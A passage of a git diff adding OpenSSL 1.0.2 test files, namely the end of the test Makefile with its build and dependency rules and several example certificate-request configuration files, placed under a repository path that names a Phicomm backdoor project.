+test_cms: ../apps/openssl$(EXE_EXT) cms-test.pl smcont.txt
+	@echo "CMS consistency test"
+	$(PERL) cms-test.pl
+
+test_srp: $(SRPTEST)$(EXE_EXT)
+	@echo "Test SRP"
+	../util/shlib_wrap.sh ./srptest
+
+test_ocsp: ../apps/openssl$(EXE_EXT) tocsp
+	@echo "Test OCSP"
+	@sh ./tocsp
+
+test_v3name: $(V3NAMETEST)$(EXE_EXT)
+	@echo "Test X509v3_check_*"
+	../util/shlib_wrap.sh ./$(V3NAMETEST)
+
+test_heartbeat: $(HEARTBEATTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(HEARTBEATTEST)
+
+test_constant_time: $(CONSTTIMETEST)$(EXE_EXT)
+	@echo "Test constant time utilites"
+	../util/shlib_wrap.sh ./$(CONSTTIMETEST)
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	else \
+	    $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(SRC); \
+	fi
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f $(SRC) $(SHA256TEST).c $(SHA512TEST).c evptests.txt newkey.pem testkey.pem \
+			testreq.pem
+
+clean:
+	rm -f .rnd tmp.bntest tmp.bctest *.o *.obj *.dll lib tags core .pure .nfs* *.old *.bak fluff $(EXE) *.ss *.srl log dummytest
+
+$(DLIBSSL):
+	(cd ..; $(MAKE) DIRS=ssl all)
+
+$(DLIBCRYPTO):
+	(cd ..; $(MAKE) DIRS=crypto all)
+
+BUILD_CMD=shlib_target=; if [ -n "$(SHARED_LIBS)" ]; then \
+		shlib_target="$(SHLIB_TARGET)"; \
+	fi; \
+	LIBRARIES="$(LIBSSL) $(LIBCRYPTO) $(LIBKRB5)"; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		CC="$${CC}" APPNAME=$$target$(EXE_EXT) OBJECTS="$$target.o" \
+		LIBDEPS="$(PEX_LIBS) $$LIBRARIES $(EX_LIBS)" \
+		link_app.$${shlib_target}
+
+FIPS_BUILD_CMD=shlib_target=; if [ -n "$(SHARED_LIBS)" ]; then \
+		shlib_target="$(SHLIB_TARGET)"; \
+	fi; \
+	LIBRARIES="$(LIBSSL) $(LIBCRYPTO) $(LIBKRB5)"; \
+	if [ -z "$(SHARED_LIBS)" -a -n "$(FIPSCANLIB)" ] ; then \
+		FIPSLD_CC="$(CC)"; CC=$(FIPSDIR)/bin/fipsld; export CC FIPSLD_CC; \
+	fi; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		CC="$${CC}" APPNAME=$$target$(EXE_EXT) OBJECTS="$$target.o" \
+		LIBDEPS="$(PEX_LIBS) $$LIBRARIES $(EX_LIBS)" \
+		link_app.$${shlib_target}
+
+BUILD_CMD_STATIC=shlib_target=; \
+	LIBRARIES="$(DLIBSSL) $(DLIBCRYPTO) $(LIBKRB5)"; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		APPNAME=$$target$(EXE_EXT) OBJECTS="$$target.o" \
+		LIBDEPS="$(PEX_LIBS) $$LIBRARIES $(EX_LIBS)" \
+		link_app.$${shlib_target}
+
+$(RSATEST)$(EXE_EXT): $(RSATEST).o $(DLIBCRYPTO)
+	@target=$(RSATEST); $(BUILD_CMD)
+
+$(BNTEST)$(EXE_EXT): $(BNTEST).o $(DLIBCRYPTO)
+	@target=$(BNTEST); $(BUILD_CMD)
+
+$(ECTEST)$(EXE_EXT): $(ECTEST).o $(DLIBCRYPTO)
+	@target=$(ECTEST); $(BUILD_CMD)
+
+$(EXPTEST)$(EXE_EXT): $(EXPTEST).o $(DLIBCRYPTO)
+	@target=$(EXPTEST); $(BUILD_CMD)
+
+$(IDEATEST)$(EXE_EXT): $(IDEATEST).o $(DLIBCRYPTO)
+	@target=$(IDEATEST); $(BUILD_CMD)
+
+$(MD2TEST)$(EXE_EXT): $(MD2TEST).o $(DLIBCRYPTO)
+	@target=$(MD2TEST); $(BUILD_CMD)
+
+$(SHATEST)$(EXE_EXT): $(SHATEST).o $(DLIBCRYPTO)
+	@target=$(SHATEST); $(BUILD_CMD)
+
+$(SHA1TEST)$(EXE_EXT): $(SHA1TEST).o $(DLIBCRYPTO)
+	@target=$(SHA1TEST); $(BUILD_CMD)
+
+$(SHA256TEST)$(EXE_EXT): $(SHA256TEST).o $(DLIBCRYPTO)
+	@target=$(SHA256TEST); $(BUILD_CMD)
+
+$(SHA512TEST)$(EXE_EXT): $(SHA512TEST).o $(DLIBCRYPTO)
+	@target=$(SHA512TEST); $(BUILD_CMD)
+
+$(RMDTEST)$(EXE_EXT): $(RMDTEST).o $(DLIBCRYPTO)
+	@target=$(RMDTEST); $(BUILD_CMD)
+
+$(MDC2TEST)$(EXE_EXT): $(MDC2TEST).o $(DLIBCRYPTO)
+	@target=$(MDC2TEST); $(BUILD_CMD)
+
+$(MD4TEST)$(EXE_EXT): $(MD4TEST).o $(DLIBCRYPTO)
+	@target=$(MD4TEST); $(BUILD_CMD)
+
+$(MD5TEST)$(EXE_EXT): $(MD5TEST).o $(DLIBCRYPTO)
+	@target=$(MD5TEST); $(BUILD_CMD)
+
+$(HMACTEST)$(EXE_EXT): $(HMACTEST).o $(DLIBCRYPTO)
+	@target=$(HMACTEST); $(BUILD_CMD)
+
+$(WPTEST)$(EXE_EXT): $(WPTEST).o $(DLIBCRYPTO)
+	@target=$(WPTEST); $(BUILD_CMD)
+
+$(RC2TEST)$(EXE_EXT): $(RC2TEST).o $(DLIBCRYPTO)
+	@target=$(RC2TEST); $(BUILD_CMD)
+
+$(BFTEST)$(EXE_EXT): $(BFTEST).o $(DLIBCRYPTO)
+	@target=$(BFTEST); $(BUILD_CMD)
+
+$(CASTTEST)$(EXE_EXT): $(CASTTEST).o $(DLIBCRYPTO)
+	@target=$(CASTTEST); $(BUILD_CMD)
+
+$(RC4TEST)$(EXE_EXT): $(RC4TEST).o $(DLIBCRYPTO)
+	@target=$(RC4TEST); $(BUILD_CMD)
+
+$(RC5TEST)$(EXE_EXT): $(RC5TEST).o $(DLIBCRYPTO)
+	@target=$(RC5TEST); $(BUILD_CMD)
+
+$(DESTEST)$(EXE_EXT): $(DESTEST).o $(DLIBCRYPTO)
+	@target=$(DESTEST); $(BUILD_CMD)
+
+$(RANDTEST)$(EXE_EXT): $(RANDTEST).o $(DLIBCRYPTO)
+	@target=$(RANDTEST); $(BUILD_CMD)
+
+$(DHTEST)$(EXE_EXT): $(DHTEST).o $(DLIBCRYPTO)
+	@target=$(DHTEST); $(BUILD_CMD)
+
+$(DSATEST)$(EXE_EXT): $(DSATEST).o $(DLIBCRYPTO)
+	@target=$(DSATEST); $(BUILD_CMD)
+
+$(METHTEST)$(EXE_EXT): $(METHTEST).o $(DLIBCRYPTO)
+	@target=$(METHTEST); $(BUILD_CMD)
+
+$(SSLTEST)$(EXE_EXT): $(SSLTEST).o $(DLIBSSL) $(DLIBCRYPTO)
+	@target=$(SSLTEST); $(FIPS_BUILD_CMD)
+
+$(ENGINETEST)$(EXE_EXT): $(ENGINETEST).o $(DLIBCRYPTO)
+	@target=$(ENGINETEST); $(BUILD_CMD)
+
+$(EVPTEST)$(EXE_EXT): $(EVPTEST).o $(DLIBCRYPTO)
+	@target=$(EVPTEST); $(BUILD_CMD)
+
+$(ECDSATEST)$(EXE_EXT): $(ECDSATEST).o $(DLIBCRYPTO)
+	@target=$(ECDSATEST); $(BUILD_CMD)
+
+$(ECDHTEST)$(EXE_EXT): $(ECDHTEST).o $(DLIBCRYPTO)
+	@target=$(ECDHTEST); $(BUILD_CMD)
+
+$(IGETEST)$(EXE_EXT): $(IGETEST).o $(DLIBCRYPTO)
+	@target=$(IGETEST); $(BUILD_CMD)
+
+$(JPAKETEST)$(EXE_EXT): $(JPAKETEST).o $(DLIBCRYPTO)
+	@target=$(JPAKETEST); $(BUILD_CMD)
+
+$(ASN1TEST)$(EXE_EXT): $(ASN1TEST).o $(DLIBCRYPTO)
+	@target=$(ASN1TEST); $(BUILD_CMD)
+
+$(SRPTEST)$(EXE_EXT): $(SRPTEST).o $(DLIBCRYPTO)
+	@target=$(SRPTEST); $(BUILD_CMD)
+
+$(V3NAMETEST)$(EXE_EXT): $(V3NAMETEST).o $(DLIBCRYPTO)
+	@target=$(V3NAMETEST); $(BUILD_CMD)
+
+$(HEARTBEATTEST)$(EXE_EXT): $(HEARTBEATTEST).o $(DLIBCRYPTO)
+	@target=$(HEARTBEATTEST); $(BUILD_CMD_STATIC)
+
+$(CONSTTIMETEST)$(EXE_EXT): $(CONSTTIMETEST).o
+	@target=$(CONSTTIMETEST) $(BUILD_CMD)
+
+#$(AESTEST).o: $(AESTEST).c
+#	$(CC) -c $(CFLAGS) -DINTERMEDIATE_VALUE_KAT -DTRACE_KAT_MCT $(AESTEST).c
+
+#$(AESTEST)$(EXE_EXT): $(AESTEST).o $(DLIBCRYPTO)
+#	if [ "$(SHLIB_TARGET)" = "hpux-shared" -o "$(SHLIB_TARGET)" = "darwin-shared" ] ; then \
+#	  $(CC) -o $(AESTEST)$(EXE_EXT) $(CFLAGS) $(AESTEST).o $(PEX_LIBS) $(DLIBCRYPTO) $(EX_LIBS) ; \
+#	else \
+#	  $(CC) -o $(AESTEST)$(EXE_EXT) $(CFLAGS) $(AESTEST).o $(PEX_LIBS) $(LIBCRYPTO) $(EX_LIBS) ; \
+#	fi
+
+dummytest$(EXE_EXT): dummytest.o $(DLIBCRYPTO)
+	@target=dummytest; $(BUILD_CMD)
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+asn1test.o: ../include/openssl/asn1.h ../include/openssl/asn1_mac.h
+asn1test.o: ../include/openssl/bio.h ../include/openssl/bn.h
+asn1test.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+asn1test.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+asn1test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+asn1test.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+asn1test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+asn1test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+asn1test.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+asn1test.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+asn1test.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+asn1test.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h asn1test.c
+bftest.o: ../e_os.h ../include/openssl/blowfish.h ../include/openssl/e_os2.h
+bftest.o: ../include/openssl/opensslconf.h bftest.c
+bntest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+bntest.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+bntest.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+bntest.o: ../include/openssl/dsa.h ../include/openssl/e_os2.h
+bntest.o: ../include/openssl/err.h ../include/openssl/evp.h
+bntest.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+bntest.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+bntest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+bntest.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+bntest.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+bntest.o: ../include/openssl/sha.h ../include/openssl/stack.h
+bntest.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+bntest.o: ../include/openssl/x509_vfy.h bntest.c
+casttest.o: ../e_os.h ../include/openssl/cast.h ../include/openssl/e_os2.h
+casttest.o: ../include/openssl/opensslconf.h casttest.c
+constant_time_test.o: ../crypto/constant_time_locl.h ../e_os.h
+constant_time_test.o: ../include/openssl/e_os2.h
+constant_time_test.o: ../include/openssl/opensslconf.h constant_time_test.c
+destest.o: ../include/openssl/crypto.h ../include/openssl/des.h
+destest.o: ../include/openssl/des_old.h ../include/openssl/e_os2.h
+destest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+destest.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+destest.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+destest.o: ../include/openssl/ui.h ../include/openssl/ui_compat.h destest.c
+dhtest.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/bn.h
+dhtest.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+dhtest.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+dhtest.o: ../include/openssl/lhash.h ../include/openssl/opensslconf.h
+dhtest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+dhtest.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+dhtest.o: ../include/openssl/stack.h ../include/openssl/symhacks.h dhtest.c
+dsatest.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/bn.h
+dsatest.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+dsatest.o: ../include/openssl/dsa.h ../include/openssl/e_os2.h
+dsatest.o: ../include/openssl/err.h ../include/openssl/lhash.h
+dsatest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+dsatest.o: ../include/openssl/ossl_typ.h ../include/openssl/rand.h
+dsatest.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+dsatest.o: ../include/openssl/symhacks.h dsatest.c
+ecdhtest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ecdhtest.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+ecdhtest.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ecdhtest.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ecdhtest.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+ecdhtest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ecdhtest.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+ecdhtest.o: ../include/openssl/sha.h ../include/openssl/stack.h
+ecdhtest.o: ../include/openssl/symhacks.h ecdhtest.c
+ecdsatest.o: ../include/openssl/opensslconf.h ecdsatest.c
+ectest.o: ../e_os.h ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+ectest.o: ectest.c
+enginetest.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+enginetest.o: enginetest.c
+evp_test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+evp_test.o: ../include/openssl/bn.h ../include/openssl/conf.h
+evp_test.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+evp_test.o: ../include/openssl/err.h ../include/openssl/evp.h
+evp_test.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+evp_test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+evp_test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+evp_test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+evp_test.o: ../include/openssl/symhacks.h evp_test.c
+exptest.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/bn.h
+exptest.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+exptest.o: ../include/openssl/err.h ../include/openssl/lhash.h
+exptest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+exptest.o: ../include/openssl/ossl_typ.h ../include/openssl/rand.h
+exptest.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+exptest.o: ../include/openssl/symhacks.h exptest.c
+heartbeat_test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+heartbeat_test.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+heartbeat_test.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+heartbeat_test.o: ../include/openssl/dsa.h ../include/openssl/dtls1.h
+heartbeat_test.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+heartbeat_test.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+heartbeat_test.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+heartbeat_test.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+heartbeat_test.o: ../include/openssl/opensslconf.h
+heartbeat_test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+heartbeat_test.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+heartbeat_test.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+heartbeat_test.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+heartbeat_test.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+heartbeat_test.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+heartbeat_test.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+heartbeat_test.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+heartbeat_test.o: ../include/openssl/tls1.h ../include/openssl/x509.h
+heartbeat_test.o: ../include/openssl/x509_vfy.h ../ssl/ssl_locl.h
+heartbeat_test.o: ../test/testutil.h heartbeat_test.c
+hmactest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+hmactest.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+hmactest.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+hmactest.o: ../include/openssl/hmac.h ../include/openssl/md5.h
+hmactest.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+hmactest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+hmactest.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+hmactest.o: ../include/openssl/stack.h ../include/openssl/symhacks.h hmactest.c
+ideatest.o: ../e_os.h ../include/openssl/e_os2.h
+ideatest.o: ../include/openssl/opensslconf.h ideatest.c
+igetest.o: ../include/openssl/aes.h ../include/openssl/e_os2.h
+igetest.o: ../include/openssl/opensslconf.h ../include/openssl/ossl_typ.h
+igetest.o: ../include/openssl/rand.h igetest.c
+jpaketest.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+jpaketest.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+jpaketest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+jpaketest.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+jpaketest.o: ../include/openssl/symhacks.h jpaketest.c
+md2test.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+md2test.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+md2test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+md2test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+md2test.o: ../include/openssl/symhacks.h md2test.c
+md4test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+md4test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+md4test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+md4test.o: ../include/openssl/md4.h ../include/openssl/obj_mac.h
+md4test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+md4test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+md4test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+md4test.o: ../include/openssl/symhacks.h md4test.c
+md5test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+md5test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+md5test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+md5test.o: ../include/openssl/md5.h ../include/openssl/obj_mac.h
+md5test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+md5test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+md5test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+md5test.o: ../include/openssl/symhacks.h md5test.c
+mdc2test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+mdc2test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+mdc2test.o: ../include/openssl/des.h ../include/openssl/des_old.h
+mdc2test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+mdc2test.o: ../include/openssl/mdc2.h ../include/openssl/obj_mac.h
+mdc2test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+mdc2test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+mdc2test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+mdc2test.o: ../include/openssl/symhacks.h ../include/openssl/ui.h
+mdc2test.o: ../include/openssl/ui_compat.h mdc2test.c
+randtest.o: ../e_os.h ../include/openssl/e_os2.h
+randtest.o: ../include/openssl/opensslconf.h ../include/openssl/ossl_typ.h
+randtest.o: ../include/openssl/rand.h randtest.c
+rc2test.o: ../e_os.h ../include/openssl/e_os2.h
+rc2test.o: ../include/openssl/opensslconf.h ../include/openssl/rc2.h rc2test.c
+rc4test.o: ../e_os.h ../include/openssl/e_os2.h
+rc4test.o: ../include/openssl/opensslconf.h ../include/openssl/rc4.h
+rc4test.o: ../include/openssl/sha.h rc4test.c
+rc5test.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+rc5test.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+rc5test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+rc5test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+rc5test.o: ../include/openssl/symhacks.h rc5test.c
+rmdtest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rmdtest.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+rmdtest.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+rmdtest.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+rmdtest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+rmdtest.o: ../include/openssl/ossl_typ.h ../include/openssl/ripemd.h
+rmdtest.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+rmdtest.o: ../include/openssl/symhacks.h rmdtest.c
+rsa_test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rsa_test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+rsa_test.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+rsa_test.o: ../include/openssl/lhash.h ../include/openssl/opensslconf.h
+rsa_test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+rsa_test.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+rsa_test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+rsa_test.o: ../include/openssl/symhacks.h rsa_test.c
+sha1test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+sha1test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+sha1test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+sha1test.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+sha1test.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+sha1test.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+sha1test.o: ../include/openssl/sha.h ../include/openssl/stack.h
+sha1test.o: ../include/openssl/symhacks.h sha1test.c
+shatest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+shatest.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+shatest.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+shatest.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+shatest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+shatest.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+shatest.o: ../include/openssl/sha.h ../include/openssl/stack.h
+shatest.o: ../include/openssl/symhacks.h shatest.c
+srptest.o: ../include/openssl/opensslconf.h srptest.c
+ssltest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssltest.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+ssltest.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+ssltest.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+ssltest.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+ssltest.o: ../include/openssl/err.h ../include/openssl/evp.h
+ssltest.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+ssltest.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ssltest.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+ssltest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ssltest.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ssltest.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ssltest.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+ssltest.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssltest.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssltest.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssltest.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssltest.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssltest.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ssltest.o: ../include/openssl/x509v3.h ssltest.c
+v3nametest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+v3nametest.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+v3nametest.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+v3nametest.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+v3nametest.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+v3nametest.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+v3nametest.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+v3nametest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+v3nametest.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+v3nametest.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+v3nametest.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+v3nametest.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+v3nametest.o: ../include/openssl/x509v3.h v3nametest.c
+wp_test.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+wp_test.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+wp_test.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+wp_test.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+wp_test.o: ../include/openssl/whrlpool.h wp_test.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/P1ss.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/P1ss.cnf
new file mode 100644
index 0000000..326cce2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/P1ss.cnf
@@ -0,0 +1,37 @@
+#
+# SSLeay example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+
+RANDFILE		= ./.rnd
+
+####################################################################
+[ req ]
+default_bits		= 1024
+default_keyfile 	= keySS.pem
+distinguished_name	= req_distinguished_name
+encrypt_rsa_key		= no
+default_md		= md2
+
+[ req_distinguished_name ]
+countryName			= Country Name (2 letter code)
+countryName_default		= AU
+countryName_value		= AU
+
+organizationName                = Organization Name (eg, company)
+organizationName_value          = Dodgy Brothers
+
+0.commonName			= Common Name (eg, YOUR name)
+0.commonName_value		= Brother 1
+
+1.commonName			= Common Name (eg, YOUR name)
+1.commonName_value		= Brother 2
+
+2.commonName			= Common Name (eg, YOUR name)
+2.commonName_value		= Proxy 1
+
+[ v3_proxy ]
+basicConstraints=CA:FALSE
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid,issuer:always
+proxyCertInfo=critical,language:id-ppl-anyLanguage,pathlen:1,policy:text:AB
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/P2ss.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/P2ss.cnf
new file mode 100644
index 0000000..8b50232
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/P2ss.cnf
@@ -0,0 +1,45 @@
+#
+# SSLeay example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+
+RANDFILE		= ./.rnd
+
+####################################################################
+[ req ]
+default_bits		= 1024
+default_keyfile 	= keySS.pem
+distinguished_name	= req_distinguished_name
+encrypt_rsa_key		= no
+default_md		= md2
+
+[ req_distinguished_name ]
+countryName			= Country Name (2 letter code)
+countryName_default		= AU
+countryName_value		= AU
+
+organizationName                = Organization Name (eg, company)
+organizationName_value          = Dodgy Brothers
+
+0.commonName			= Common Name (eg, YOUR name)
+0.commonName_value		= Brother 1
+
+1.commonName			= Common Name (eg, YOUR name)
+1.commonName_value		= Brother 2
+
+2.commonName			= Common Name (eg, YOUR name)
+2.commonName_value		= Proxy 1
+
+3.commonName			= Common Name (eg, YOUR name)
+3.commonName_value		= Proxy 2
+
+[ v3_proxy ]
+basicConstraints=CA:FALSE
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid,issuer:always
+proxyCertInfo=critical,@proxy_ext
+
+[ proxy_ext ]
+language=id-ppl-anyLanguage
+pathlen=0
+policy=text:BC
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Sssdsa.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Sssdsa.cnf
new file mode 100644
index 0000000..8e170a2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Sssdsa.cnf
@@ -0,0 +1,27 @@
+#
+# SSLeay example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+# hacked by iang to do DSA certs - Server
+
+RANDFILE              = ./.rnd
+
+####################################################################
+[ req ]
